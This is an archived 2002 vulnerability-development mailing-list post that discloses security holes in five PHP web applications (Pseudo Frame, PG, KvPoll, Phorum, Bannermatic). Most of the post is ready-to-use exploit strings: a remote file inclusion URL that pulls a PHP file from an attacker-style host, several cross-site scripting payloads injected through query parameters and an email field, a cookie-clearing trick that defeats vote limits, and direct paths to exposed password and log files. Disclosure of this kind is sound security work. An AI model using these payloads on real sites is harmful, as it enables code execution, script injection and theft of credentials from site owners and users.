Vulnerability Development mailing list archives
Security holes : Pseudo-Frame, PG, KvPoll, Phorum, BanMat
From: frog frog <leseulfrog () hotmail com>
Date: 12 May 2002 11:44:26 -0000
Product 1 : *********** Pseudo Frame 1.0 http://www.clicky-web.net Problem : - Including file Exploit : - http://www.site.com/index.php? page=http://www.haxor.com/file with file.php on http://www.haxor.com . Product 2 : *********** PG 1.0 http://www.clicky-web.net Problems : - XSS - Path Disclosure Exploits : - index.php?picture_n="% 20width=0><script>SCRIPT</script><img%20width=0% 20src="&gallery_name=path - index.php?picture_n=image.gif&gallery_name=non-existant- path Product 3 : *********** KvPoll 1.1 http://www.killervault.com Problem : - Skirting of safety against multiple vote Exploit : - /clear_cookies.php Product 4 : *********** Phorum 3.3.2a RC1 http://phorum.org Problem : - XSS Exploits : - /read.php?f=1&i=1&t=1"><form%20name=o><input%20name=u% 20value=XSS></form><script>alert(document.o.u.value) </script> - "><script>SCRIPT</script> in a message in the "email" input Product 5 : *********** BANNERMATIC V1, V2, V3 http://www.getcruising.com Problem : - Informations recovering Exploits : - /ban.log - /ban.bak - /ban.dat - /banmat.pwd frog-m@n
Current thread:
- Security holes : Pseudo-Frame, PG, KvPoll, Phorum, BanMat frog frog (May 12)